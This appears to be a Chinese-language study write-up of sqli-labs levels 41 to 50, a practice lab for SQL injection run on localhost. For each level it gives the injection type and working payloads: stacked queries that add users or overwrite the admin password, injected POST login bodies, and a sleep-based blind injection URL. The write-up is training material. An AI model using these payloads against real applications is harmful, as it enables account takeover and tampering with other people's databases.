sqli-labs 41到50

第四十一题

 判断为数字型注入，如果使用union注入很快可以，但这里可以使用堆叠查询注入

 也是跟上一题一样的。

id=1;insert into users(id,username,password) value (21,'sd','bd')--+d

第四十二题

是一个post型传参

再password处存在闭合方式为‘的注入

 如果使用报错注入会很简单

 如果点击新建用户，会看到：

 因此用注入的方式创建一个用户

 

修改admin密码

1';update users set password=12344 where username='admin';

 第四十三题

 存在'）闭合注入，报错注入

 或者堆叠查询注入

login_user=1&login_password=1');update users set password='sdsdsd' where username='admin';-- -&mysubmit=Login

 第四十四题

测试'  、"等都没有反应

使用以下语句，用户名正确，密码用万能密码

发现'时页面不一样

 如果不用抓包的话其实已经登录成功了

 因此是’闭合。

还是堆叠查询注入

login_user=admin&login_password=1';insert into users(id,username,password) value (21,'sd','bd')--+&mysubmit=Login

 第四十五题

没有任何回显，使用语句admin')#登录成功，闭合方式为‘)

 依然是堆叠查询注入。与之前一样

第四十六题

 为数字型注入

 第四十七题

上一题中sort只能填1到3，这里无论填了几都是一样的输出

判断闭合方式为’的字符型注入 

 继续用报错注入

 第四十八题

数字型注入，没有错误回显，使用时间盲注

http://localhost/sqli-labs-php7-master/Less-48?sort=1 and (if (ascii(substr(database(),1,1))=163,0,sleep(5)))--+

 第四十九题

闭合方式为'的时间盲注，与上一题一样。

 第五十题

 数字型注入，有报错回显

可以报错注入也可以堆叠查询注入。